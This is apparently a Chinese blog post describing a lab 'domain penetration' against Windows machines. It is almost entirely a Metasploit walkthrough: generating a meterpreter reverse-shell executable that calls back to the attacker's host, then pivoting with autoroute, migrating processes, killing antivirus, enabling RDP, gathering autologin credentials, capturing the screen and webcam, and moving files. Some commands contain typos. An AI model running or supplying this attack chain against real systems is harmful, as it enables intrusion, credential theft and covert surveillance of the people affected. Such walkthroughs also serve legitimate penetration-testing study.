一次简单的域渗透

攻击机:kali  192.168.44.131

军事区:window7 192.168.44.139   192.168.4.

非军事区: window server 2003  192.168.4.

kali:

返回的连接可以使用background 将当前连接切换到后台运行;

3、切换到后台的会话可以使用session -i查看到,然后使用session -i id 将后台的会话切换回前台;

4、切换到后台的会话可以使用session -i查看到,还可以使用session -k id 将后台指定会话中断;

msfvenom -l windows/x64/meterpreter/reverse_tcp -lhost=192.168.44.131 -lport=4444 -f exe -o shy.exe

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.44.131

set lport 4444

expliot

ipconfig发现另一网段

run autoroute -s 192.168.4.20/24 添加路由

run autoroute -p 查看路由是否添加成功

getpid 查看自己的meterpreter shell 进程号

ps 查看目标机正在运行的进程

migrate pid 将自己的shell进程移动到一个稳定的进程当中。比如Explore.exe.

getpid 发现自己shell的进程号已经改变,说明已经成功迁移到稳定的进程当中。

或者 使用自动迁移命令(run post/windows/manage/migrate)自己寻找合适的进程进行迁移

 run post/windows/manage/migrate 

run post/windows/gather/checkvm 

idletime

route

run post/windows/manage/killav

run post/windows/manage/enable_rdp

run post/windows/gather/enum_logged_on_users 

run post/windows/gather/enum_applications

run windows/gather/credentials/windows_autologin

load espia

screengrab screenshot

webcam_list  

webcam_snap

webcam_stream

shell exit

文件系统命令

pwd

getlwd

search -f 123.txt -d c:

download c:/123.txt /root

upload /root/123.txt c:

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/104965297